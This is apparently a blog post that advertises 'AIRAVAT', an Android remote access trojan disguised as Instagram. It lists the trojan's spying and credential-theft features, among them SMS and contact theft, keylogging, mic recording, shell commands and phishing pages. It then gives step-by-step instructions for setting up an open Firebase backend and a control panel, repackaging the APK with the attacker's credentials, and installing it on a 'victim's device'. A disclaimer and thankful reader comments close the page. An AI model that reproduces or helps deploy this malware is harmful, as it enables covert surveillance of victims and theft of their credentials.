What is Android Hacking
Android hacking refers to the process of exploiting vulnerabilities and security flaws in Android operating
systems
and applications to gain unauthorized access to information or control of the device. This can include
techniques
such as rooting or jailbreaking, which allow users to bypass restrictions imposed by the operating system and
access
advanced features or install custom applications. It can also include more malicious activities such as malware
or
phishing attacks, where hackers create fake applications or websites to trick users into downloading malicious
software or revealing sensitive information.
Android hacking can pose a significant threat to user privacy and security, as it can allow hackers to gain access to sensitive data such as passwords, personal information, and financial details. As the Android operating system is one of the most popular mobile operating systems globally, it is a common target for cybercriminals seeking to exploit vulnerabilities for financial gain or other malicious purposes. Therefore, it is essential for Android users to stay vigilant and take steps to protect their devices from hacking attempts, such as using strong passwords, avoiding downloading apps from untrusted sources, and keeping their software up to date with the latest security patches.
Features:-
- Read all the files of Internal Storage
- Download Any Media to your Device from Victims Device
- Get all the system information of Victim Device
- Retrieve the List of Installed Applications
- Retrive SMS
- Retrive Call Logs
- Retrive Contacts
- Send SMS
- Gets all the Notifications
- Keylogger
- Admin Permission
- Show Phishing Pages to steal credentials through notification.
- Steal credentials through pre built phishing pages
- Open any suspicious website through notification to steal credentials.
- Record Audio through Mic
- Play music in Victim's device
- Vibrate Device
- Text To Speech
- Turn On/Off Torch Light
- Change Wallpaper
- Run shell Commands
- Get Clipboard text (Only When app's Activity is visible)
- Launch Any URL (Only When app's Activity is visible)
- Pre Binded with Instagram Webview Phishing
- Runs In BackgroundAuto Starts on restarting the device
- Auto Starts when any notification arrives
- No port forwarding needed
Requirements:-
- Firebase Account
- ApkEasy Tool ( For PC ) or ApkTool M ( for Android)
How to Build
Firebase Setup
- Create an Firebase Account and afterwords create a new project with any name.
- Enable Firebase Database and Firebase Storage.
- In Firebase Database Click on the rules and set .read and .write to true
- In Firebase Storage allow reads and writes for all paths.
- Now Go to project overview and create an Android App and download the google-services.json file.
- Also create a web app and copy the config of webapp.
{
"rules": {
".read": "true",
".write": "true"
}
}
rules_version = '2';
service firebase.storage {
match /b/{bucket}/o {
match /{allPaths=**} {
allow read, write
}
}
}
Practical Video
Panel Setup
- You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
- Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
- Save the file , Your Panel Setup is completed.
Android RAT
- Download Instagram.apk
- Decompile it using any Decompiler recommend above.
- Now open res/values/strings.xml file.
- Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
- Now compile the code with appt2.
- Install the app in victim's device and give all the permissions after that the connection will show up in web panel.
<string name="firebase_database_url">https://your_database_url.firebase.com</string>
<string name="google_api_key">your_api_key</string>
<string name="google_app_id">your_app_id</string>
<string name="google_storage_bucket">your_storage_bucket_url</string>
<string name="project_id">project_id</string>
DISCLAIMER
The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.

%20(2).jpg)
Thank you soo much💖💖
ReplyDeleteVery helpful 💖💖
Thanks man🌟
ReplyDelete